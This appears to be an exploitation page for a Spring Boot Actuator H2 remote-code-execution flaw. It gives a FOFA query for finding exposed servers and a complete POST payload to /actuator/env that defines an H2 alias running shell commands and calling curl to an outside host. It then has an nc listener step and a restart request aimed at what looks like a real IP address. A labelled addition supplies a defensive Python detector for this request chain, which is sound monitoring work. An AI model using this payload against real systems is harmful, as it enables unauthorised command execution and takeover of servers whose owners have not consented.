# Spring Boot Actuator H2 RCE Vulnerability

==Vulnerability Impact==

Spring Boot < 1.5
Spring Boot >= 1.5

==FOFA==

body="Whitelabel Error Page"

==Exploitation==

Access the following URL:
http://x.x.x.x:port/actuator

Send the following POST request to set the value of spring.datasource.hikari.connection-test-query.
POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}

Start an nc listener, then send a POST request to the /actuator/restart endpoint to restart the application.
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356

{}
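
A defender-side check for the request sequence above, as an added example that is not part of the original page: it flags a POST to the env endpoint that overrides the Hikari connection test query or carries H2 alias SQL, followed by a restart request from the same source. The record fields (ts, src, method, path, body), the 900-second window and the sample records are assumptions, and it presumes a proxy or WAF log that captures request bodies.

```python
import json
import re

# Property the page's request overwrites; compared after relaxed-binding normalisation.
WATCHED = {"spring.datasource.hikari.connectiontestquery"}
# H2 SQL that defines or calls a Java alias, as in the request body on this page.
ALIAS_SQL = re.compile(r"\bCREATE\s+ALIAS\b|\bCALL\s+\w+\s*\(", re.I)
ENV = re.compile(r"^(/actuator)?/env/?$")          # Boot 2.x and 1.x style paths
RESTART = re.compile(r"^(/actuator)?/restart/?$")

def env_write_reason(body):
    """Return why a POST body sent to the env endpoint is suspicious, else None."""
    try:
        doc = json.loads(body)
        name, value = str(doc["name"]), str(doc.get("value", ""))
    except (TypeError, ValueError, KeyError, AttributeError):
        return None
    if ALIAS_SQL.search(value):
        return "H2 alias SQL in property value"
    if re.sub(r"[-_]", "", name).lower() in WATCHED:
        return "connection test query overridden"
    return None

def find_chains(records, window=900):
    """Pair a suspicious env write with a restart from the same source within `window` s."""
    pending, alerts = {}, []
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["method"] != "POST":
            continue
        path = r["path"].split("?", 1)[0]
        if ENV.match(path):
            reason = env_write_reason(r.get("body"))
            if reason:
                pending[r["src"]] = (r["ts"], reason)
        elif RESTART.match(path) and r["src"] in pending:
            ts, reason = pending.pop(r["src"])
            if r["ts"] - ts <= window:
                alerts.append((r["src"], ts, r["ts"], reason))
    return alerts

# Constructed records (documentation addresses; the SQL value is a non-functional stand-in).
Q = "spring.datasource.hikari.connection-test-query"
SAMPLE = [
    {"ts": 10, "src": "198.51.100.7", "method": "POST", "path": "/actuator/env",
     "body": json.dumps({"name": Q, "value": "CREATE ALIAS DEMO AS '...'; CALL DEMO('x');"})},
    {"ts": 40, "src": "198.51.100.7", "method": "POST", "path": "/actuator/restart", "body": "{}"},
    {"ts": 50, "src": "203.0.113.9", "method": "POST", "path": "/actuator/env",
     "body": json.dumps({"name": "logging.level.root", "value": "DEBUG"})},
    {"ts": 60, "src": "203.0.113.9", "method": "POST", "path": "/actuator/restart", "body": "{}"},
]
```

`find_chains(SAMPLE)` returns a single alert for 198.51.100.7; the log-level change followed by a restart from 203.0.113.9 is not flagged.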

